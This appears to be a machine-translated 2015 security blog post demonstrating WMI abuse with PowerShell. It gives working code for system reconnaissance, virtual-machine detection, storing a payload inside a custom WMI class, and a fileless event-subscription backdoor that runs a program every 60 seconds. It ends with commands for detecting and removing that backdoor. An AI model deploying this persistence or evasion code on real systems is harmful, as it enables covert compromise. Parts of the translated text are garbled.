Merit student · 2015/08/24 10:19
0 x00 preface
In Blackhat, Matt Graeber explains how to use WMI and show how it works, but the details are reserved, so this time, he explains how to implement WMI attacks using PowerShell.
0 x01 instructions
WMI trying osmosis is the most common in wmiexec before mentioned in http://drops.wooyun.org/tips/7358 So Remote WMI don’t focus on
Reference links: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-P ersistent%20Asynchronous-And-Fileless-Backdoor.pdf
https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
0x02 Test Environment
Operating system: Win8 X32 Powershell V3 (default installation for Win8) Enable the Winmgmt service and support WMI
0x03 WMI attacks
Note: The following codes arepowershellcode
1, the investigation
Operating system information
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_OperatingSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_ComputerSystem
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_BIOS
Copy the codeList of files/directories
Get-WmiObject -Namespace ROOT\CIMV2 -Class CIM_DataFile
Copy the codeDisk Volume List
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Volume
Copy the codeRegistry operations
Get-WmiObject -Namespace ROOT\DEFAULT -Class StdRegProv Push-Location HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Run Get-ItemProperty OptionalComponentsCopy the codeAs shown in figure
The current process
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Process
Copy the codeList the service
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Service
Copy the codeThe log
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_NtLogEvent
Copy the codeLogin account
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_LoggedOnUser
Copy the codeShared
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_Share
Copy the codeThe patch
Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_QuickFixEngineering
Copy the codeAntivirus software
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
Copy the code2. Vm detection
(1) the judgement TotalPhysicalMemory and NumberOfLogicalProcessors
$VMDetected = $False
$Arguments = @{
Class = 'Win32_ComputerSystem'
Filter = 'NumberOfLogicalProcessors < 2 AND TotalPhysicalMemory < 2147483648'
}
if (Get-WmiObject @Arguments) {
$VMDetected = $True
"In vm"
}
else{
"Not in vm"
}
Copy the code(2) Determine the VM process
$VMwareDetected = $False
$VMAdapter = Get-WmiObject Win32_NetworkAdapter -Filter 'Manufacturer LIKE
"%VMware%" OR Name LIKE "%VMware%"'
$VMBios = Get-WmiObject Win32_BIOS -Filter 'SerialNumber LIKE "%VMware%"'
$VMToolsRunning = Get-WmiObject Win32_Process -Filter 'Name="vmtoolsd.exe"'
if ($VMAdapter -or $VMBios -or $VMToolsRunning)
{ $VMwareDetected = $True
"in vm"
}
else
{
"not in vm"
}
Copy the code3. Store payload
[Administrator rights]
$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null,
$null)
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Put()
$StaticClass.Properties.Add('EvilProperty' , "This is payload")
$StaticClass.Put()
Copy the codeAs shown in figure
Tips:
Can be encrypted storage in this location, the execution of the decryption operation, to achieve the hard disk does not save the file effectCopy the code4. Covert timing start procedure
[Administrator rights]
$filterName = 'BotFilter82' $consumerName = 'BotConsumer23' $exePath = 'C:\Windows\System32\notepad.exe' $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name= $filterName; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query=$Query} -ErrorAction Stop $WMIEventConsumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @ {Name=$consumerName; ExecutablePath=$exePath; CommandLineTemplate=$exePath} Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter= $WMIEventFilter; Consumer=$WMIEventConsumer}Copy the codeAs shown in figure
Run notepad.exe every 60 seconds
Tips:
Stuxnet has used this backdoor before, through MOF implementation so far this backdoor method... And there are a lot of people using anti-virus software that won't kill this behavior...Copy the code0x04 WMI Backdoor Detection and Clearing:
1. View the current WMI events
[Administrator rights]
#List Event Filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
#List Event Consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
#List Event Bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
Copy the codeAs shown in figure
2, clear the back door
[Administrator rights]
#Filter
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='BotFilter82'" | Remove-WmiObject -Verbose
#Consumer
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='BotConsumer23'" | Remove-WmiObject -Verbose
#Binding
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%BotFilter82%'" | Remove-WmiObject -Verbose
Copy the codeAs shown in figure
0 x05 summary
It’s not just Powershell that implements WMI Attacks, for example
-- VBS -- MOF -- C/C++ via IWbem* COM API --.NET System.Management classesCopy the codeThere are many ways to detect this, such as looking at logs
- Microsoft-Windows-WinRM/Operational - Microsoft-Windows-WMI-Activity/Operational - Microsoft-Windows-distributedcomCopy the codeEven disabling the Winmgmt service prevents this method from being used at all
More methods of WMI attacks are welcome to discuss.
This article was originally written by three good students and first published by Cloud Drops